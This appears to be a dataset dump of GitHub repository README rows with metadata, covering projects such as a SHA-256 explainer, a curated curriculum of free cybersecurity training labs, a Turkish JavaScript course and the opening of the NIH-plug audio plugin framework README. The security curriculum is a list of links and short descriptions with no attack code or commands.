Note: Carta 1.2 is also known as Carta 1000. If the table cell says Carta it also likely means Carta 1000 (could be 1100 as well, I don't know for sure). | Open-source E-ink monitor. Mirror of https://gitlab.com/zephray/glider | null | 0 | 4 | 3 | 53 | 0 | 3 | 0 |
GriffinJohnston/ldrs | null | Modern, tree-shakeable loader & spinner web components. Made with CSS, HTML and SVG. https://uiball.com/ldrs | null | 0 | 2 | 2 | 100 | 3 | 1 | 0 |
dmarman/sha256algorithm |
![This is an image](./public/sha256.png)
# Sha256algorithm
Sha256 algorithm explained online step by step visually [sha256algorithm.com](https://sha256algorithm.com/)
This website will help you understand how a sha256 hash is calculated from start to finish.
I hope this will be helpful for students learning about hash functions and sha256.
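If you want to cross-check the final digest the site shows, any standard SHA-256 implementation works; for example, with Python's built-in hashlib (not part of this repo):

```python
import hashlib

# The well-known SHA-256 test vector for the message "abc".
print(hashlib.sha256(b"abc").hexdigest())
# ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad
```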
The code is quite messy and there are probably some parts that don't follow the React way.
Ask me anything at [@manceraio](https://twitter.com/manceraio)
## Install
I built this using create-react-app. If you want to play with it, just install the JavaScript dependencies:
`npm install`
and start local server:
`npm start`
| Sha256 Algorithm Explained | null | 0 | 6 | 6 | 30 | 5 | 1 | 0 |
brootware/awesome-cyber-security-university | # Awesome Cyber Security University [![Awesome](https://awesome.re/badge.svg)](https://awesome.re)
> A curated list of awesome and free educational resources that focuses on learn by doing.
<div align="center">
<a href="https://brootware.github.io/awesome-cyber-security-university/"><img src="assets/purpleteam.png" width="250"/></a>
<br/>
<i>Because education should be free.</i>
<br/>
<a href="https://brootware.github.io/awesome-cyber-security-university/"><img src="https://visitor-badge.glitch.me/badge?page_id=brootware.cyber-security-university&right_color=blue" /></a>
</div>
## Contents
* [About](#about)
* [Introduction and Pre-Security](#introduction-and-pre-security) - (Completed/In Progress)
* [Free Beginner Red Team Path](#free-beginner-red-team-path) - (Add your badge here. The badge code is hidden in this repo)
* [Free Beginner Blue Team Path](#free-beginner-blue-team-path) - (Add your badge here. The badge code is hidden in this repo)
* [Bonus CTF practice and Latest CVEs](#bonus-ctf-practice-and-latest-cves) - (Completed/In Progress)
* [Bonus Windows](#bonus-windows) - (Completed/In Progress)
* [Extremely Hard Rooms to do](#extremely-hard-rooms-to-do) - (Completed/In Progress)
<!-- | Paths | Completion |
| -------------------------------- | ---------------------|
|[Introduction and Pre-Security](#-introduction-and-pre-security) |(Completed/In Progress) |
|[Free Beginner Red Team Path](#-free-beginner-red-team-path) |(Add your badge here. Badge code is hidden in this repo) |
|[Free Beginner Blue Team Path](#-free-beginner-blue-team-path) |(Add your badge here. Badge code is hidden in this repo) |
|[Bonus CTF practice & Latest CVEs](#-bonus-ctf-practice-and-latest-cves)|(Completed/In Progress)|
|[Bonus Windows](#-bonus-windows)|(Completed/In Progress)|
|[Extremely Hard Rooms to do](#-extremely-hard-rooms-to-do) |(Completed/In Progress) | -->
## About
Cyber Security University is a curated list of awesome and free educational resources that focus on learning by doing.
There are 6 parts to this.
1. Introduction and Pre-security
2. Free Beginner Red Team Path
3. Free Beginner Blue Team Path
4. Bonus practices
5. Latest CVEs
6. Extremely Hard rooms
The tasks increase in difficulty roughly linearly, so it's recommended to do them in order. But you can still jump around and skip some rooms if you find that you are already familiar with the concepts.
<!--lint disable double-link-->
As you go through the curriculum, you will find completion badges for both the red and blue team paths hidden within this [`README.md`](https://github.com/brootware/Cyber-Security-University/blob/main/README.md). You can copy their HTML code and add it to the contents list once you have completed a path.
<!--lint disable double-link-->
[↑](#contents)
<!--lint enable double-link-->
## Contributing
Pull requests are welcome with the condition that the resource should be free! Please read the [contribution guide in the wiki](https://github.com/brootware/Cyber-Security-University/wiki) if you wish to add tools or resources.
## Introduction and Pre-Security
### Level 1 - Intro
<!--lint disable double-link-->
* [OpenVPN](<https://tryhackme.com/room/openvpn>) - Learn how to connect to a virtual private network using OpenVPN.<!--lint enable double-link-->
* [Welcome](<https://tryhackme.com/jr/welcome>) - Learn how to use a TryHackMe room to start your upskilling in cyber security.
* [Intro to Researching](<https://tryhackme.com/room/introtoresearch>) - A brief introduction to research skills for pentesting.
* [Linux Fundamentals 1](<https://tryhackme.com/room/linuxfundamentalspart1>) - Embark on the journey of learning the fundamentals of Linux. Learn to run some of the first essential commands on an interactive terminal.
* [Linux Fundamentals 2](<https://tryhackme.com/room/linuxfundamentalspart2>) - Embark on the journey of learning the fundamentals of Linux. Learn to run some of the first essential commands on an interactive terminal.
* [Linux Fundamentals 3](<https://tryhackme.com/room/linuxfundamentalspart3>) - Embark on the journey of learning the fundamentals of Linux. Learn to run some of the first essential commands on an interactive terminal.
* [Pentesting fundamentals](<https://tryhackme.com/room/pentestingfundamentals>) - Fundamentals of penetration testing.
* [Principles of security](<https://tryhackme.com/room/principlesofsecurity>) - Principles of security.
* [Red Team Engagements](<https://tryhackme.com/room/redteamengagements>) - Intro to red team engagements.
* [Hip Flask](https://tryhackme.com/room/hipflask) - An in-depth walkthrough covering pentest methodology against a vulnerable server.
<!-- markdownlint-disable MD036 -->
**Introductory CTFs to get your feet wet**<!-- markdownlint-enable MD036 -->
* [Google Dorking](<https://tryhackme.com/room/googledorking>) - Explaining how Search Engines work and leveraging them into finding hidden content!
* [Osint](<https://tryhackme.com/room/ohsint>) - Intro to Open Source Intelligence.
* [Shodan.io](<https://tryhackme.com/room/shodan>) - Learn about Shodan.io and how to use it for device enumeration.
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
## Free Beginner Red Team Path
### Level 2 - Tooling
* [Tmux](<https://tryhackme.com/room/rptmux>) - Learn to use tmux, one of the most powerful multi-tasking tools on linux.
* [Nmap, Curl and Netcat](<https://echoctf.red/challenge/1>) - Get experience with Nmap, Curl and Netcat for network communications.
* [Web Scanning](<https://tryhackme.com/room/rustscan>) - Learn the basics of automated web scanning.
* [Sublist3r](<https://tryhackme.com/room/rpsublist3r>) - Learn how to find subdomains with Sublist3r.
* [Metasploit](<https://tryhackme.com/room/metasploitintro>) - An introduction to the main components of the Metasploit Framework.
* [Hydra](<https://tryhackme.com/room/hydra>) - Learn about and use Hydra, a fast network logon cracker, to bruteforce and obtain a website's credentials.
* [Linux Privesc](<https://tryhackme.com/room/linuxprivesc>) - Practice your Linux Privilege Escalation skills on an intentionally misconfigured Debian VM with multiple ways to get root! SSH is available.
* [Red Team Fundamentals](<https://tryhackme.com/room/redteamfundamentals>) - Learn about the basics of a red engagement, the main components and stakeholders involved, and how red teaming differs from other cyber security engagements.
* [Red Team Recon](<https://tryhackme.com/room/redteamrecon>) - Learn how to use DNS, advanced searching, Recon-ng, and Maltego to collect information about your target.
<!-- markdownlint-disable MD036 -->
**Red Team Intro CTFs**<!-- markdownlint-enable MD036 -->
* [Vulnversity](<https://tryhackme.com/room/vulnversity>) - Learn about active recon, web app attacks and privilege escalation.
* [Blue](<https://tryhackme.com/room/blue>) - Deploy & hack into a Windows machine, leveraging common misconfigurations issues.
* [Simple CTF](<https://tryhackme.com/room/easyctf>) - Beginner level CTF.
* [Bounty Hacker](<https://tryhackme.com/room/cowboyhacker>) - A space cowboy-themed boot to root machine.
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
### Level 3 - Crypto & Hashes with CTF practice
* [Crack the hash](<https://tryhackme.com/room/crackthehash>) - Cracking hash challenges.
* [Agent Sudo](<https://tryhackme.com/room/agentsudoctf>) - You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.
* [The Cod Caper](<https://tryhackme.com/room/thecodcaper>) - A guided room taking you through infiltrating and exploiting a Linux system.
* [Ice](<https://tryhackme.com/room/ice>) - Deploy & hack into a Windows machine, exploiting a very poorly secured media server.
* [Lazy Admin](<https://tryhackme.com/room/lazyadmin>) - Easy linux machine to practice your skills.
* [Basic Pentesting](<https://tryhackme.com/room/basicpentestingjt>) - This is a machine that allows you to practice web app hacking and privilege escalation.
* [Bypassing UAC](https://tryhackme.com/room/bypassinguac) - Learn common ways to bypass User Account Control (UAC) in Windows hosts.
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
### Level 4 - Web
* [OWASP top 10](<https://tryhackme.com/room/owasptop10>) - Learn about and exploit each of the OWASP Top 10 vulnerabilities; the 10 most critical web security risks.
* [Inclusion](<https://tryhackme.com/room/inclusion>) - A beginner-level LFI challenge.
* [Injection](<https://tryhackme.com/room/injection>) - Walkthrough of OS Command Injection. Demonstrate OS Command Injection and explain how to prevent it on your servers.
* [Juiceshop](<https://tryhackme.com/room/owaspjuiceshop>) - This room uses the OWASP juice shop vulnerable web application to learn how to identify and exploit common web application vulnerabilities.
* [Overpass](<https://tryhackme.com/room/overpass>) - What happens when some broke CompSci students make a password manager.
* [Year of the Rabbit](<https://tryhackme.com/room/yearoftherabbit>) - Can you hack into the Year of the Rabbit box without falling down a hole?
* [DevelPy](<https://tryhackme.com/room/bsidesgtdevelpy>) - Boot2root machine for FIT and bsides Guatemala CTF.
* [Jack of all trades](<https://tryhackme.com/room/jackofalltrades>) - Boot-to-root originally designed for Securi-Tay 2020.
* [Bolt](https://tryhackme.com/room/bolt) - Bolt themed machine to root into.
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
### Level 5 - Reverse Engineering & Pwn
* [Intro to x86 64](<https://tryhackme.com/room/introtox8664>) - This room teaches the basics of x86-64 assembly language.
* [CC Ghidra](<https://tryhackme.com/room/ccghidra>) - This room teaches the basics of ghidra.
* [CC Radare2](<https://tryhackme.com/room/ccradare2>) - This room teaches the basics of radare2.
* [Reverse Engineering](<https://tryhackme.com/room/reverseengineering>) - This room focuses on teaching the basics of assembly through reverse engineering.
* [Reversing ELF](<https://tryhackme.com/room/reverselfiles>) - Room for beginner Reverse Engineering CTF players.
* [Dumping Router Firmware](<https://tryhackme.com/room/rfirmware>) - Reverse engineering router firmware.
* [Intro to pwntools](<https://tryhackme.com/room/introtopwntools>) - Introduction to popular pwn tools framework.
* [Pwnkit: CVE-2021-4034](<https://tryhackme.com/room/pwnkit>) - Interactive lab for exploiting and remediating Pwnkit (CVE-2021-4034) in the Polkit package.
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
### Level 6 - PrivEsc
* [Sudo Security Bypass](<https://tryhackme.com/room/sudovulnsbypass>) - A tutorial room exploring CVE-2019-14287 in the Unix Sudo Program. Room One in the SudoVulns Series.
* [Sudo Buffer Overflow](<https://tryhackme.com/room/sudovulnsbof>) - A tutorial room exploring CVE-2019-18634 in the Unix Sudo Program. Room Two in the SudoVulns Series.
* [Windows Privesc Arena](<https://tryhackme.com/room/windowsprivescarena>) - Students will learn how to escalate privileges using a very vulnerable Windows 7 VM.
* [Linux Privesc Arena](<https://tryhackme.com/room/linuxprivescarena>) - Students will learn how to escalate privileges using a very vulnerable Linux VM.
* [Windows Privesc](<https://tryhackme.com/room/windows10privesc>) - Students will learn how to escalate privileges using a very vulnerable Windows 7 VM.
* [Blaster](<https://tryhackme.com/room/blaster>) - Metasploit Framework to get a foothold.
* [Ignite](<https://tryhackme.com/room/ignite>) - A new start-up has a few security issues with its web server.
* [Kenobi](<https://tryhackme.com/room/kenobi>) - Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation.
* [Capture the flag](<https://tryhackme.com/room/c4ptur3th3fl4g>) - Another beginner-level CTF challenge.
* [Pickle Rick](<https://tryhackme.com/room/picklerick>) - Rick and Morty themed LFI challenge.
> Congratulations! If you have made it this far, you deserve a badge! Put it in your writeups or git profile. You can continue with the CTFs below.
<details>
<summary>Click here to get your red team badge!</summary>
<https://gist.github.com/brootware/e30a10dbccf334eb95da7ea59d6f87fe>
</details>
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
## Free Beginner Blue Team Path
### Level 1 - Tools
* [Introduction to digital forensics](https://tryhackme.com/room/introdigitalforensics) - Intro to Digital Forensics.
* [Windows Fundamentals](<https://tryhackme.com/room/windowsfundamentals1xbx>) - Intro to Windows.
* [Nessus](<https://tryhackme.com/room/rpnessusredux>) - Intro to nessus scan.
* [Mitre](<https://tryhackme.com/room/mitre>) - Intro to Mitre attack framework.
* [IntroSIEM](https://tryhackme.com/room/introtosiem) - Introduction to SIEM.
* [Yara](<https://tryhackme.com/room/yara>) - Intro to yara for malware analysis.
* [OpenVAS](<https://tryhackme.com/room/openvas>) - Intro to openvas.
* [Intro to Honeypots](<https://tryhackme.com/room/introductiontohoneypots>) - Intro to honeypots.
* [Volatility](<https://cyberdefenders.org/blueteam-ctf-challenges/redline/>) - Intro to memory analysis with volatility.
* [Red Line](<https://tryhackme.com/room/btredlinejoxr3d>) - Learn how to use Redline to perform memory analysis and scan for IOCs on an endpoint.
* [Autopsy](<https://tryhackme.com/room/autopsy2ze0>) - Use Autopsy to investigate artifacts from a disk image.
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
### Level 2 - Security Operations, Incident Response & Threat Hunting
* [Investigating Windows](<https://tryhackme.com/room/investigatingwindows>) - Investigating Windows.
* [Juicy Details](<https://tryhackme.com/room/juicydetails>) - A popular juice shop has been breached! Analyze the logs to see what had happened.
* [Carnage](<https://tryhackme.com/room/c2carnage>) - Apply your analytical skills to analyze the malicious network traffic using Wireshark.
* [Squid Game](<https://tryhackme.com/room/squidgameroom>) - Squid game-themed CTF.
* [Splunk Boss of the SOC V1](<https://tryhackme.com/room/bpsplunk>) - Part of the Blue Primer series, learn how to use Splunk to search through massive amounts of information.
* [Splunk Boss of the SOC V2](<https://cyberdefenders.org/blueteam-ctf-challenges/16>) - Splunk analysis vol 2.
* [Splunk Boss of the SOC V3](<https://cyberdefenders.org/blueteam-ctf-challenges/8>) - Splunk analysis vol 3.
* [Hunt Conti with Splunk](https://tryhackme.com/room/contiransomwarehgh) - An Exchange server was compromised with ransomware. Use Splunk to investigate how the attackers compromised the server.
* [Hunting for Execution Tactic](https://info.cyborgsecurity.com/en-us/threat-hunting-workshop-3) - Join Cyborg Security's expert threat hunters as they dive into the interesting MITRE ATT&CK Tactic of Execution (TA0002).
* [Hunting for Credential Access](https://info.cyborgsecurity.com/en-us/threat-hunting-workshop-5) - Join Cyborg Security's expert threat hunters as they dive into the interesting MITRE ATT&CK Tactic of Credential Access (TA0006).
* [Hunting for Persistence Access](https://info.cyborgsecurity.com/en-us/threat-hunting-workshop-2) - Join Cyborg Security's team of threat hunting instructors for a fun and hands-on-keyboard threat hunting workshop covering the topic of adversarial persistence (TA0003).
* [Hunting for Defense Evasion](https://info.cyborgsecurity.com/en-us/threat-hunting-workshop-4) - Join Cyborg Security's expert threat hunters as they dive into the interesting MITRE ATT&CK Tactic of Defense Evasion (TA0005).
<!--lint disable double-link-->
[↑](#contents)
<!--lint enable double-link-->
### Level 3 - Beginner Forensics, Threat Intel & Cryptography
* [Matryoshka doll](<https://play.picoctf.org/practice/challenge/129?category=4&page=1&solved=0>) - Beginner file analysis challenge.
* [The Glory of the Garden](<https://play.picoctf.org/practice/challenge/44?category=4&page=1&solved=0>) - Beginner image analysis challenge.
* [Packets Primer](<https://play.picoctf.org/practice/challenge/286?category=4&page=2&solved=0>) - Beginner packet analysis challenge.
* [Wireshark doo doo doo](<https://play.picoctf.org/practice/challenge/115?category=4&page=1&solved=0>) - Beginner packet analysis challenge.
* [Wireshark two two two](<https://play.picoctf.org/practice/challenge/110?category=4&page=1&solved=0>) - Beginner packet analysis challenge.
* [Trivial flag transfer protocol](<https://play.picoctf.org/practice/challenge/103?category=4&page=1&solved=0>) - Beginner packet analysis challenge.
* [What Lies within](<https://play.picoctf.org/practice/challenge/74?category=4&page=2&solved=0>) - Beginner decoding analysis challenge.
* [Illumination](<https://app.hackthebox.com/challenges/illumination>) - Medium level forensics challenge.
* [Emo](<https://app.hackthebox.com/challenges/emo>) - Medium level forensics challenge.
* [Obscure](<https://app.hackthebox.com/challenges/obscure>) - Medium level forensics challenge.
* [Intel101 Challenge](<https://cyberdefenders.org/blueteam-ctf-challenges/38>) - Medium level Threat Intel challenge.
* [Introduction to Cryptohack](<https://cryptohack.org/courses/intro/course_details/>) - Medium level cryptography challenge.
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
### Level 4 - Memory & Disk Forensics
* [Sleuthkit Intro](<https://play.picoctf.org/practice/challenge/301?category=4&page=2&solved=0>) - Medium level disk forensics challenge.
* [Reminiscent](<https://app.hackthebox.com/challenges/reminiscent>) - Medium level disk forensics challenge.
* [Hunter - Windows Disk Image Forensics](<https://cyberdefenders.org/blueteam-ctf-challenges/32>) - Medium level disk forensics challenge.
* [Spotlight - Mac Disk Image Forensics](<https://cyberdefenders.org/blueteam-ctf-challenges/34>) - Medium level disk forensics challenge.
* [Ulysses - Linux Disk Image Forensics](<https://cyberdefenders.org/blueteam-ctf-challenges/41>) - Medium level disk forensics challenge.
* [Banking Troubles - Windows Memory Image Forensics](<https://cyberdefenders.org/blueteam-ctf-challenges/43>) - Medium level memory forensics challenge.
* [Detect Log4J](<https://cyberdefenders.org/blueteam-ctf-challenges/86>) - Medium level disk forensics challenge.
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
### Level 5 - Malware and Reverse Engineering
* [History of Malware](<https://tryhackme.com/room/historyofmalware>) - Intro to malware history.
* [Malware Introduction](<https://tryhackme.com/room/malmalintroductory>) - Intro to malware.
* [Basic Malware Reverse Engineering](<https://tryhackme.com/room/basicmalwarere>) - Intro to malware RE.
* [Intro Windows Reversing](<https://tryhackme.com/room/windowsreversingintro>) - Intro to Windows RE.
* [Windows x64 Assembly](<https://tryhackme.com/room/win64assembly>) - Introduction to x64 Assembly on Windows.
* [JVM reverse engineering](<https://tryhackme.com/room/jvmreverseengineering>) - Learn Reverse Engineering for Java Virtual Machine bytecode.
* [Get PDF (Malicious Document)](<https://cyberdefenders.org/blueteam-ctf-challenges/47>) - Reversing PDF malware.
> Congratulations! If you have made it this far, you deserve a badge! Put it in your writeups or git profile. You can continue with the CTFs below.
<details>
<summary>Click here to get your blue team badge!</summary>
<https://gist.github.com/brootware/62b76a84aaa8d6f55c82f6f329ad6d2d>
</details>
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
## Bonus CTF practice and Latest CVEs
* [Bandit](<https://overthewire.org/wargames/bandit/>) - Aimed at absolute beginners and teaches the basics of remote server access.
* [Natas](<https://overthewire.org/wargames/natas/>) - Teaches the basics of serverside web-security.
* [Post Exploitation Basics](<https://tryhackme.com/room/postexploit>) - Learn the basics of post-exploitation and maintaining access with mimikatz, bloodhound, powerview and msfvenom.
* [Smag Grotto](<https://tryhackme.com/room/smaggrotto>) - An obscure boot-to-root machine.
* [Dogcat](<https://tryhackme.com/room/dogcat>) - I made a website where you can look at pictures of dogs and/or cats! Exploit a PHP application via LFI and break out of a docker container.
* [Buffer Overflow Prep](<https://tryhackme.com/room/bufferoverflowprep>) - Practice stack-based buffer overflows.
* [Break out the cage](<https://tryhackme.com/room/breakoutthecage1>) - Help Cage bring back his acting career and investigate the nefarious going on of his agent.
* [Lian Yu](<https://tryhackme.com/room/lianyu>) - A beginner-level security challenge.
* [Insecure Kubernetes](<https://tryhackme.com/room/insekube>) - Exploiting Kubernetes by leveraging a Grafana LFI vulnerability.
* [The Great Escape (docker)](<https://tryhackme.com/room/thegreatescape>) - Escaping docker container.
* [Solr Exploiting Log4j](<https://tryhackme.com/room/solar>) - Explore CVE-2021-44228, a vulnerability in log4j affecting almost all software under the sun.
* [Spring4Shell](<https://tryhackme.com/room/spring4shell>) - Interactive lab for exploiting Spring4Shell (CVE-2022-22965) in the Java Spring Framework.
* [Most Recent threats](<https://tryhackme.com/module/recent-threats>) - Learn about the latest industry threats. Get hands-on experience identifying, exploiting, and mitigating critical vulnerabilities.
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
## Bonus Windows
* [Attacktive Directory](<https://tryhackme.com/room/attacktivedirectory>) - Learn about Active Directory, which 99% of corporate networks run on.
* [Retro](<https://tryhackme.com/room/retro>) - Breaking out of the retro-themed box.
* [Blue Print](<https://tryhackme.com/room/blueprint>) - Hack into this Windows machine and escalate your privileges to Administrator.
* [Anthem](<https://tryhackme.com/room/anthem>) - Exploit a Windows machine in this beginner-level challenge.
* [Relevant](<https://tryhackme.com/room/relevant>) - Penetration Testing Challenge.
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
## Extremely Hard Rooms to do
* [Ra](<https://tryhackme.com/room/ra>) - You have found WindCorp's internal network and their Domain Controller. Pwn the network.
* [CCT2019](<https://tryhackme.com/room/cct2019>) - Legacy challenges from the US Navy Cyber Competition Team 2019 Assessment sponsored by US TENTH Fleet.
* [Theseus](<https://tryhackme.com/room/theseus>) - The first installment of the SuitGuy series of very hard challenges.
* [IronCorp](<https://tryhackme.com/room/ironcorp>) - Get access to Iron Corp's system.
* [Carpe Diem 1](<https://tryhackme.com/room/carpediem1>) - Recover your client's encrypted files before the ransomware timer runs out.
* [Borderlands](<https://tryhackme.com/room/borderlands>) - Compromise a perimeter host and pivot through this network.
* [Jeff](<https://tryhackme.com/room/jeff>) - Hack into Jeff's web server.
* [Year of the Owl](https://tryhackme.com/room/yearoftheowl) - Owl-themed boot to root machine.
* [Anonymous Playground](<https://tryhackme.com/room/anonymousplayground>) - Want to become part of Anonymous? They have a challenge for you.
* [EnterPrize](<https://tryhackme.com/room/enterprize>) - Enterprise-themed network to hack into.
* [Racetrack Bank](<https://tryhackme.com/room/racetrackbank>) - It's time for another heist.
* [Python Playground](<https://tryhackme.com/room/pythonplayground>) - Use python to pwn this room.
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
## Footnotes
**Inspired by** <https://skerritt.blog/free-rooms/>
### Contributors & stargazers ✨
<!-- ALL-CONTRIBUTORS-BADGE:START - Do not remove or modify this section -->
[![All Contributors](https://img.shields.io/badge/all_contributors-2-orange.svg?style=flat-square)](#contributors-)
<!-- ALL-CONTRIBUTORS-BADGE:END -->
Special thanks to everyone who forked or starred the repository ❤️
[![Stargazers repo roster for @brootware/awesome-cyber-security-university](https://reporoster.com/stars/dark/brootware/awesome-cyber-security-university)](https://github.com/brootware/awesome-cyber-security-university/stargazers)
[![Forkers repo roster for @brootware/awesome-cyber-security-university](https://reporoster.com/forks/dark/brootware/awesome-cyber-security-university)](https://github.com/brootware/awesome-cyber-security-university/network/members)
Thanks goes to these wonderful people ([emoji key](https://allcontributors.org/docs/en/emoji-key)):
<!-- ALL-CONTRIBUTORS-LIST:START - Do not remove or modify this section -->
<!-- prettier-ignore-start -->
<!-- markdownlint-disable -->
<table>
<tr>
<td align="center"><a href="https://brootware.github.io"><img src="https://avatars.githubusercontent.com/u/7734956?v=4?s=100" width="100px;" alt=""/><br /><sub><b>Oaker Min</b></sub></a><br /><a href="#infra-brootware" title="Infrastructure (Hosting, Build-Tools, etc)">🚇</a> <a href="#maintenance-brootware" title="Maintenance">🚧</a> <a href="https://github.com/brootware/cyber-security-university/commits?author=brootware" title="Documentation">📖</a> <a href="https://github.com/brootware/cyber-security-university/commits?author=brootware" title="Code">💻</a></td>
<td align="center"><a href="https://lucidcode.com"><img src="https://avatars.githubusercontent.com/u/1631870?v=4?s=100" width="100px;" alt=""/><br /><sub><b>Michael Paul Coder</b></sub></a><br /><a href="https://github.com/brootware/cyber-security-university/commits?author=IAmCoder" title="Documentation">📖</a></td>
</tr>
</table>
<!-- markdownlint-restore -->
<!-- prettier-ignore-end -->
<!-- ALL-CONTRIBUTORS-LIST:END -->
This project follows the [all-contributors](https://github.com/all-contributors/all-contributors) specification. Contributions of any kind are welcome!
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
| 🎓 Because Education should be free. Contributions welcome! 🕵️ | cyber-security,awesome-list,curriculum,courses,free,education,educational-project,cybersecurity,hacking,learning-by-doing | 0 | 4 | 37 | 212 | 1 | 3 | 2 |
tayfunerbilen/30-gunde-javascript | # 30 Günde Javascript
I am translating into Turkish the repo '[30 Days of JavaScript](https://github.com/Asabeneh/30-Days-Of-JavaScript)' created by Asabeneh S. Yetayeh, which aims to teach JavaScript in 30 days.
However, in this repo, instead of the Turkish version itself, I will be sharing example solutions to the exercises at the end of each lesson, dear friends <3
Let's also drop the videos of the series here:
* [Day 1 - Introduction](https://www.youtube.com/watch?v=8A7RWDgkXgg)
* [Day 2 - Data Types](https://www.youtube.com/watch?v=pl8W3ypHmbk)
* [Day 3 - Booleans, Operators and Date Operations](https://www.youtube.com/watch?v=BVNsL2UiDXg)
* [Day 4 - Conditionals](https://www.youtube.com/watch?v=b914QqaZYb8)
* [Day 5 - Arrays](https://www.youtube.com/watch?v=OWevID6C7j0)
* [Day 6 - Loops](https://www.youtube.com/watch?v=B_grs48l5gA)
* [Day 7 - Functions](https://www.youtube.com/watch?v=fCewgC4rgWs)
* [Day 8 - Scope, Objects](https://www.youtube.com/watch?v=isASqtTf1Vs)
* [Day 9 - Higher Order Functions](https://www.youtube.com/watch?v=_Yg5xml3mC4)
* [Day 10 - Set, Map](https://www.youtube.com/watch?v=TwqhonAoZfQ)
* [Day 11 - Destructuring, Spread, Rest](https://www.youtube.com/watch?v=evy8I07Oim0)
* [Day 12 - Regular Expressions, RegExp](https://www.youtube.com/watch?v=iDN5hmCc8s8)
* [Day 13 - Console Methods](https://www.youtube.com/watch?v=CZPyKqSsCbc)
* [Day 14 - Error Handling](https://www.youtube.com/watch?v=hCLH_HDX6G0)
* [Day 15 - Classes](https://www.youtube.com/watch?v=vuSV9yq3fgQ)
* [Day 16 - JSON](https://www.youtube.com/watch?v=BZvLCGQvbs8)
* [Day 17 - Web Storage](https://www.youtube.com/watch?v=OicvaygNn5M)
* [Day 18 - Promise, Fetch, Async/Await](https://www.youtube.com/watch?v=abyMOwipR9E)
* [Day 19 - Closures](https://www.youtube.com/watch?v=Pe3XVMooHVc)
* [Day 20 - Writing Clean Code](https://www.youtube.com/watch?v=XPa5yQIm5NM)
* [Day 21 - DOM](https://www.youtube.com/watch?v=Z7L1M9iHMi4)
* [Day 22 - DOM 2](https://www.youtube.com/watch?v=F1ehrtj2vWE)
* [Day 23 - DOM 3 - Events](https://www.youtube.com/watch?v=uMJBoDAsmYs)
* [Day 24 - Element](https://www.youtube.com/watch?v=CtpoIiAqi9Y) ([Documentation](./24-Gun.md))
* [Day 25](https://www.youtube.com/watch?v=Oa6994-dsc8) ([Documentation](./25-Gun.md))
* [Day 26](https://www.youtube.com/watch?v=aN372PKpNYA) ([Documentation](./26-Gun.md))
| 30 Günde Javascript is an experience based on the original "30 days of challenge", aiming to teach JavaScript step by step in 30 days. | javascript | 0 | 2 | 7 | 61 | 2 | 1 | 0 |
malerba118/scrollex | # Scrollex
A library to help you make beautiful scroll experiences using minimal code.
## Docs
[https://scrollex-docs.vercel.app/](https://scrollex-docs.vercel.app/)
## Demos
[https://scrollex-docs.vercel.app/examples](https://scrollex-docs.vercel.app/examples)
https://user-images.githubusercontent.com/5760059/167218020-d1ff94a8-a138-418e-9ef0-779c849a7c23.mp4
| Build beautiful scroll experiences using minimal code | null | 0 | 2 | 4 | 33 | 1 | 4 | 0 |
robbert-vdh/nih-plug | # NIH-plug
[![Automated builds](https://github.com/robbert-vdh/nih-plug/actions/workflows/build.yml/badge.svg?branch=master)](https://github.com/robbert-vdh/nih-plug/actions/workflows/build.yml?query=branch%3Amaster)
[![Tests](https://github.com/robbert-vdh/nih-plug/actions/workflows/test.yml/badge.svg?branch=master)](https://github.com/robbert-vdh/nih-plug/actions/workflows/test.yml?query=branch%3Amaster)
[![Docs](https://github.com/robbert-vdh/nih-plug/actions/workflows/docs.yml/badge.svg?branch=master)](https://nih-plug.robbertvanderhelm.nl/)
NIH-plug is an API-agnostic audio plugin framework written in Rust, as well as a
small collection of plugins. The idea is to have a stateful yet simple plugin
API that gets rid of as much unnecessary ceremony as possible, while also
keeping the amount of magic to a minimum and making it easy to experiment with
different approaches to things. See the [current features](#current-features)
section for more information on the project's current status.
Check out the [documentation](https://nih-plug.robbertvanderhelm.nl/), or use
the [cookiecutter template](https://github.com/robbert-vdh/nih-plug-template) to
quickly get started with NIH-plug.
### Table of contents
- [Plugins](#plugins)
- [Framework](#framework)
- [Current features](#current-features)
- [Building](#building)
- [Plugin formats](#plugin-formats)
- [Example plugins](#example-plugins)
- [Licensing](#licensing)
## Plugins
Check each plugin's readme file for more details on what the plugin actually
does. You can download the development binaries for Linux, Windows and macOS
from the [automated
builds](https://github.com/robbert-vdh/nih-plug/actions/workflows/build.yml?query=branch%3Amaster)
page. Or if you're not signed in on GitHub, then you can also find the latest
nightly build
[here](https://nightly.link/robbert-vdh/nih-plug/workflows/build/master). You
may need to [disable Gatekeeper](https://disable-gatekeeper.github.io/) on macOS to be able to use
the plugins.
Scroll down for more information on the underlying plugin framework.
- [**Buffr Glitch**](plugins/buffr_glitch) is the plugin for you if you enjoy
  the sound of a CD player skipping. This plugin is essentially a MIDI-triggered
buffer repeat plugin. When you play a note, the plugin will sample the period
corresponding to that note's frequency and use that as a single waveform
cycle. This can end up sounding like an in-tune glitch when used sparingly, or
like a weird synthesizer when used less subtly.
- [**Crisp**](plugins/crisp) adds a bright crispy top end to any low bass sound.
Inspired by Polarity's [Fake Distortion](https://youtu.be/MKfFn4L1zeg) video.
- [**Crossover**](plugins/crossover) is as boring as it sounds. It cleanly
splits the signal into two to five bands using a variety of algorithms. Those
bands are then sent to auxiliary outputs so they can be accessed and processed
individually. Meant as an alternative to Bitwig's Multiband FX devices but
with cleaner crossovers and a linear-phase option.
- [**Diopser**](plugins/diopser) is a totally original phase rotation plugin.
Useful for oomphing up kickdrums and basses, transforming synths into their
evil phase-y cousin, and making everything sound like a cheap Sci-Fi laser
